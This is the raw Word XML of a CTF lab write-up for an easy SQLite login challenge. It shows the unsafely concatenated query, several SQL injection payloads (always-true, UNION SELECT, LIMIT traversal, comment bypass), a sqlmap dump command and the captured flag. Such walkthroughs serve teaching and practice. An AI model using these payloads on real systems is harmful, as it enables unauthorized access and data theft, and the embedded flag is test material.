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B3429" w14:textId="170E5278" w:rsidR="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LIMITLESS -CTF CHALLENGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD45A18" w14:textId="7FFCFE78" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C911F02" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> Web Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F9D30" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Difficulty:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E383D" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> A login page backed by SQLite. Players must bypass authentication and extract the hidden flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B607B64" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A6F4B" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>The backend query is built unsafely using string concatenation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C3A0F" w14:textId="0732B618" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65BB6865" wp14:editId="4DAF1202">
            <wp:extent cx="5943600" cy="1492885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52097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C128F" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve">query = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>f"SELECT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve"> * FROM users WHERE username = '{username}' AND password = '{password}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB0F23B" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>Because no parameterization is used, both </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> fields are vulnerable to </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t>. Any input supplied by the attacker is directly interpolated into the SQL query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549B798" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Basic Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38152D38" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>The simplest attack is to inject a condition that always evaluates true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F747F82" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C609D" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' OR '1'='1' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34233E54" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> (anything)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471AE772" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>This makes the query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2DCC77" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve">SELECT * FROM users WHERE username = '' OR '1'='1' </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-- ' AND password = 'anything'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E09D914" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>SQLite evaluates </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'1'='1'</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> as true, so the first row (</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t>) is returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD9CB2E" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>The result: </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“Welcome back user test, Flag at admin user”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60546160" w14:textId="654DB893" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61A0CDF8" wp14:editId="24683B13">
            <wp:extent cx="5943600" cy="1565275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21201204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88C86" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>This proves injection works, but we don’t yet have the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3B2B1" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Understanding the Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B0B1C" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>The table has a number of columns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B63712" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>users(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve">username TEXT, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>display_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve"> TEXT, password TEXT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646B77CB" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>When the app executes </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SELECT *</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t>, it expects </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>say 3 columns</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF80D0" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>This means a </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> payload must also return exactly </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3 values</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D6BC6" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: Union Injection for Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FC7E52" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>We can craft a </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> query to directly select the </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3186DF24" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>Payload (entered into </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2B2945" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve"> There are multiple payloads that might work for this, we will highlight a few.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DAF097" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve"># Assuming you've </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>identifed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve"> the table structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024CB75D" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve">' UNION SELECT username, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>display_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve">, password FROM users WHERE username='admin' </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54230A7B" w14:textId="01AD1670" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="710A96C8" wp14:editId="6194CC23">
            <wp:extent cx="5943600" cy="2668905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4314147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5E428" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:lastRenderedPageBreak/>
        <w:t>This results in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1EAA58" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>SELECT * FROM users WHERE username = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C79EDAE" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve">UNION SELECT username, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>display_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve">, password FROM users WHERE username='admin' </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-- ' AND password = 'anything'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9FDB7F" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>The second </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> fetches the </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB43BD9" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>The application renders the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>display_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t> field in the welcome message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68F42E" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C8EC2" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>For the first approach, we are making an assumption the user is </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t>. We can effectively traverse the different rows using the </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> clause which constrains the number of rows returned. From below payload, we specify the limit 2, stating that we should start counting after the second row, and specify 1 as the number of rows to retrieve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD80AB" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>asdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>' or 1=1 limit 2,1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472DF1F1" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>Password can be anything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A791E0" w14:textId="751CF954" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E4761E1" wp14:editId="612EF5B3">
            <wp:extent cx="5943600" cy="2738120"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="14643880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42AB8" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5237C7B5" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>Simple authentication bypass since we know the flag is at admin user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F5560D" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF30EC3" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Retrieve the Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8A00BD" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>The app response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624B51D0" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Welcome back user admin, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>CTF{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>07da6941-e77d-414b-8426-2bc62778db38}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E7BD7" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using Automated Tools (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31DACC" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:t>Instead of manual payloads, participants could also use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>, an automated SQL injection exploitation tool, to achieve the same result. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A388F9" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve"> -r test.txt --risk=3 --level=5 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve"> --dump --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CA6929" w14:textId="0B830976" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:r w:rsidRPr="006A0918">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5382CBE1" wp14:editId="58196470">
            <wp:extent cx="5943600" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1502930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12649" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve"> quickly detects the injectable parameters, enumerates the database schema, and dumps the </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> table revealing the </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0918">
        <w:t> account with its </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>display_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t> containing the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E968793" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Takeaways</w:t>
      </w:r>
    </w:p>
